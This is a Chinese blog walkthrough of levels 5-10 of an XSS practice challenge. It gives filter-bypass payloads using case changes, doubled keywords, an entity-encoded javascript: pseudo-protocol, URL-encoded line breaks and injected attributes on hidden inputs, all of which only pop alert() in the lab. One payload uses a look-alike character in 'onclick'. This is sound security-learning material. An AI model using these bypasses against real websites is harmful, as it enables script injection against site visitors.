xss挑战之旅less5-less10,步骤加截图。

本文探讨了Web安全中的绕过过滤策略,包括大小写变换、双写、特殊字符编码等方法,展示了如何应对script、on、src等关键字过滤。同时,介绍了在不同场景下利用伪协议和URL编码进行攻击模拟,并提到了隐藏输入框可能带来的安全风险。内容涵盖了前端安全和XSS攻击防范。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

5.欢迎来到level5

6.变换大小写绕过 "> <SCRIpt>alert(6)</SCriPT>

7.双写绕过

 "><scscriptript>alert(7)<sriscriptpt>

"><a hrhrefef=javascrscriptipt:alert(7)>CLICK ME !!!</a>//

8."script"转换为"scr_ipt","on"转换为"o_n","src"转换为"sr_c","data"转换为"da_ta","href"转换为"hr_ef",'"'转换为'&quot',大小写过滤并被编码,尖括号><,单引号',%,#,&符号没有被过滤,输出点在a标签内,href属性中,属性里的双引号被转换成HTML实体,无法截断属性,这里可以使用伪协议绕过javascript:alert,由于script关键字被过滤,javascript会被替换成javasc_ript,使用&#x72来代替r,伪协议后面可以使用URL编码进行编码。

javascrip&#x74;:alert(1)//http://xxx.com

9."script"转换为"scr_ipt","on"转换为"o_n","src"转换为"sr_c","data"转换为"da_ta","href"转换为"hr_ef",'"'转换为'&quot',和上一关差不多,不同的是多了自动检测URL,如果发现没有带http://内容则会显示为不合法。

javascrip&#x74;:%0dhttp://a.com%0dalert(9)

10.需要两个参数,一个是keyword,一个是t_sort,尖括号<>都被转换成空,还有三个hidden的隐藏输入框,或许可以从隐藏的输入框下手,构造payload

keyword=test&t_sort="type="text" οnclick="alert(10)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值